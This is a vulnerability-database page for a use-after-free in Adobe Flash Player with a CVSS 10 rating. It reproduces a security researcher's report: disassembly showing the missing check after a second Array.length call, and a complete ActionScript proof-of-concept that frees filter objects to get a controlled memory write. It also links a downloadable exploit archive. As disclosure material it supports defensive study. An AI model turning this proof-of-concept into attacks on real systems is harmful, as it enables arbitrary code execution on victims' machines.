CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Use-after-free vulnerability in Adobe Flash Player before 18.0.0.232 on Windows and OS X and before 11.2.202.508 on Linux, Adobe AIR before 18.0.0.199, Adobe AIR SDK before 18.0.0.199, and Adobe AIR SDK & Compiler before 18.0.0.199 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5127, CVE-2015-5130, CVE-2015-5134, CVE-2015-5539, CVE-2015-5540, CVE-2015-5550, CVE-2015-5551, CVE-2015-5556, CVE-2015-5557, CVE-2015-5559, CVE-2015-5561, CVE-2015-5564, and CVE-2015-5565.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
87.56%
–
–
2023-03-12
–
–
–
79.26%
–
2023-04-02
–
–
–
76.24%
–
2023-05-07
–
–
–
75.91%
–
2023-06-11
–
–
–
70.3%
–
2023-08-13
–
–
–
73.78%
–
2023-11-19
–
–
–
78.51%
–
2023-12-17
–
–
–
79.19%
–
2024-04-21
–
–
–
78.34%
–
2024-06-02
–
–
–
78.34%
–
2024-06-02
–
–
–
78.34%
–
2024-12-22
–
–
–
45.37%
–
2025-01-19
–
–
–
45.37%
–
2025-02-09
–
–
–
43.49%
–
2025-03-02
–
–
–
43.49%
–
2025-01-19
–
–
–
45.37%
–
2025-02-16
–
–
–
43.49%
–
2025-03-09
–
–
–
43.49%
–
2025-03-18
–
–
–
–
60.46%
2025-03-18
–
–
–
–
60.46,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Source: https://code.google.com/p/google-security-research/issues/detail?id=484&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=508072]
VULNERABILITY DETAILS
Copy Paste of Issue 480496
VERSION
Chrome Version: N/A yet, Flash 18.0.0.203
Operating System: [Win7 x64 SP1]
REPRODUCTION CASE
Flash 18.0.0.203 patched Issue 480496 by checking if the internal filter object is still alive after the first Array.length call (from Flash player standalone):
.text:004D71DA loc_4D71DA:
.text:004D71DA and ecx, 0FFFFFFF8h
.text:004D71DD call xAS2_getArrayLength
.text:004D71E2 test eax, eax
.text:004D71E4 jle short loc_4D725D
.text:004D71E6 mov ecx, [esp+8+arg_C]
.text:004D71EA mov eax, [ecx+94h]
.text:004D71F0 test eax, 0FFFFFFFEh
.text:004D71F5 jz short loc_4D7200
.text:004D71F7 and eax, 0FFFFFFFEh
.text:004D71FA cmp dword ptr [eax+28h], 0 ; here we check whether the object has been deleted or not
.text:004D71FE jnz short loc_4D720B
.text:004D7200
.text:004D7200 loc_4D7200:
.text:004D7200 mov ecx, dword_E51A40
.text:004D7206 call sub_968A00 ; and in that case we suicide
Unfortunately they forget to do that check after the second Array.length call:
.text:004D721D loc_4D721D:
.text:004D721D and eax, 0FFFFFFF8h
.text:004D7220 push edi
.text:004D7221 mov edi, eax
.text:004D7223 mov ecx, edi
.text:004D7225 xor esi, esi
.text:004D7227 call xAS2_getArrayLength ; here we can still execute a script and delete the filters...
.text:004D722C test eax, eax
.text:004D722E jle short loc_4D725C
Should crash that way:
CPU Disasm
Address Hex dump Command Comments
004CE27F 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE282 8942 04 MOV DWORD PTR DS:[EDX+4],EAX ; write a pointer to 0x41424344
004CE285 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE288 8950 08 MOV DWORD PTR DS:[EAX+8],EDX
004CE28B FF41 08 INC DWORD PTR DS:[ECX+8]
004CE28E 8941 04 MOV DWORD PTR DS:[ECX+4],EAX
004CE291 C2 0400 RETN 4
004CE294 FF41 08 INC DWORD PTR DS:[ECX+8]
***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "4"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41424344
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
a1[i].tabStops = a2
}
a1[0xFF].tabStops = []
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
a1[0xFE].tabStops = []
a1[0xFD].tabStops = []
for (var i = 0x100; i<0x200;i++) {
_global.a1[i].tabStops = _global.a2
}
}
_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 4) f()
return 10;
}
var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o;
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37884.zip